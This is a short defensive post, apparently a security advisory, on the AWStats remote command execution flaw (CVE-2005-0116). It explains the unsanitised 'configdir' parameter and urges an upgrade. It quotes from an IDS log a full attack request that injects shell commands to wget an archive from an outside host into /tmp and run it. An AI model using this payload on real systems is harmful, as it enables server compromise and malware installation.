Cyberattacks December 2011 – AWStats Remote Command Execution Vulnerability
AWStats is a free powerful tool that generates advanced web, streaming, ftp or mail server statistics, graphically. This remote command execution vulnerability [CVE-2005-0116] was first reported back in 2005.
From one of the sample IDS logs:
The source is sending a hostile HTTP request towards the target:
GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;cd%20qmail;./start;echo%20;echo| HTTP/1.1
Via this specially-crafted HTTP request, the attacker intends to exploit the bug resides in the awstats.pl perl script. The script does not sanitize correctly the user input for the ‘configdir’ parameter. When ‘awstats.pl’ is run as a CGI (Common Gateway Interface) script, it fails to validate specific inputs which are used in a Perl open() function call. Note here that the bug is only discovered in AWStats version 6.2 and below. By exploiting this vulnerability, a remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code WITH THE RIGHTS of the web server.
Ensure AWStat has been upgraded to the latest version of (6.9 or later)
Any security-related issues on AWStats are available here: